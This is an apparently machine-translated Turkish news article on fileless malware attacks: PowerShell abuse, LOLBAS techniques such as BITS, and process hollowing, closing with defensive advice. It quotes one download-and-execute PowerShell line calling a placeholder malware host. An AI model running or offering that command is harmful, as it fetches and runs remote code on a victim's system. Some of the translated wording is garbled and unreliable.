Siber güvenlik uzmanları, bilgisayar korsanlarının PowerShell ve Meşru Microsoft uygulamalarından, tehlikeye atılan sistemlerde önemli izler bırakmadan kötü amaçlı yazılım dağıtmak için güçsüz saldırılarda artan bir eğilim konusunda uyarıyorlar.
Yirmi yılı aşkın bir süredir var olan bu sofistike saldırılar, geleneksel antivirüs çözümlerini atlamada ve olay müdahale çabalarını karmaşıklaştırmada özellikle etkilidir.
PowerShell istismarı ve lolbas teknikleri ön planda
Saldırganlar, kötü amaçlı yükleri doğrudan bellekte indirmek ve yürütmek için Microsoft’un güçlü komut dosyası dili PowerShell’i büyük ölçüde kötüye kullanıyor.
Ortak bir teknik, “IEX ((yeni nesne net.webclient)) gibi komutları kullanmayı içerir.
DownloadString (‘https://malware.com/payload.ps1’)) ”” Diske yazmadan kötü amaçlı komut dosyalarını almak ve yürütmek için.
Bu yaklaşım, tespiti geleneksel güvenlik araçları için önemli ölçüde daha zor hale getirir.
PowerShell’e ek olarak, tehdit aktörleri giderek daha fazla lolbas (kara ikili ve senaryolarında yaşayan) tekniklerini kullanıyor.
Araştırmacılara göre, bu yöntemler kötü amaçlı faaliyetler yürütmek için meşru Microsoft uygulamalarının ve yardımcı programların kötüye kullanılmasını içerir.
Örneğin, BITS (Arka Plan Akıllı Aktarım Hizmeti) Yönetici Aracı, sistemler boşta kaldığında kötü amaçlı yazılım yüklerini indirmek ve yürütmek için kullanılabilir ve güvenlik kontrollerini etkili bir şekilde atlayabilir.
Bellek enjeksiyonu ve proses oyma
Filless saldırılarının bir diğer kritik bileşeni hafıza enjeksiyonudur ve saldırganların kötü amaçlı yazılımlarını meşru süreçler olarak gizlemelerine olanak tanır.
Process Holling olarak bilinen özellikle sinsi bir teknik, askıya alınmış bir durumda meşru bir uygulamanın yürütülmesini, belleğin kodunu kötü niyetli yükle değiştirmeyi ve ardından yürütmeye devam etmeyi içerir.
İlk olarak Stuxnet kötü amaçlı yazılım tarafından popüler hale getirilen bu yöntem, saldırganların kodlarını güvenilir sistem süreçleri kisvesi altında çalıştırmalarını sağlar.
Yükselen filelsiz saldırıların tehdidiyle mücadele etmek için, siber güvenlik uzmanları çok katmanlı bir yaklaşım uygulamayı önerir.
Bu, uç nokta algılama ve yanıt (EDR) çözümlerinin dağıtılmasını, bellek analizinin geliştirilmesini ve izleme özelliklerini, kapsamlı PowerShell tomrukçuluğunun sağlanmasını ve PowerShell kısıtlı dil modunun uygulanmasını içerir.
Buna ek olarak, kuruluşların Active Directory’yi yakından izlemeleri ve kırmızı takım egzersizleri yoluyla zayıflıkları düzenli olarak test etmeleri tavsiye edilir.
Evrimleşmeye devam ettikçe, geleneksel dosya tabanlı güvenlik önlemlerinin artık yeterli olmadığı açıktır.
Kuruluşlar, bu gelişmiş tehditleri ele almak için güvenlik stratejilerini uyarlamalı, davranışa dayalı tespit ve tüm ağ altyapılarında sistem faaliyetlerinin sağlam izlenmesine odaklanmalıdır.
Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.